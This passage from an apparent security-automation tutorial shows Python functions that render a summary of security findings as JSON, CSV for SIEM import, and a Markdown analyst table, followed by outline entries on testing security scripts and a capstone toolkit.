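        "top_hosts": Counter(f["host"] for f in findings).most_common(3),
        "findings": ordered,
    }


def to_json(summary):
    return json.dumps(summary, indent=2, sort_keys=True)


def to_csv(summary):
    """Flat rows for a SIEM/dashboard import; one row per finding, highest severity first."""
    fields = ["severity", "type", "value", "host", "detail"]
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields)
    writer.writeheader()
    for f in summary["findings"]:
        writer.writerow({k: f[k] for k in fields})
    return buf.getvalue()


def to_markdown(summary):
    """Analyst view: headline counts, then a table; pipes in free text are escaped."""
    counts = ", ".join(f"{s}: {n}" for s, n in summary["by_severity"].items())
    lines = [
        f"# Security findings ({summary['generated_at']})",
        "",
        f"Total: {summary['total']} ({counts})",
        "",
        "| Severity | Type | Indicator | Host | Detail |",
        "|---|---|---|---|---|",
    ]
    for f in summary["findings"]:
        value = f["value"].replace("|", "\\|")
        detail = f["detail"].replace("|", "\\|")
        lines.append(f"| {f['severity']} | {f['type']} | `{value}` | {f['host']} | {detail} |")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(to_markdown(summarize(FINDINGS, "2024-03-15T10:05:00Z")))
```

Building the summary once and rendering it per audience keeps the three outputs consistent; the number on the dashboard and the number in the analyst's report come from the same object.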
24. Testing and QA for Security Scripts
Use unit tests and scenario-based tests (sample logs, recorded API responses, injected clocks and fake endpoints) to reduce script failures in production workflows.
25. Capstone: Security Automation Toolkit
Deliver a complete toolkit that automates data collection, enrichment, analysis, alerting, and reporting.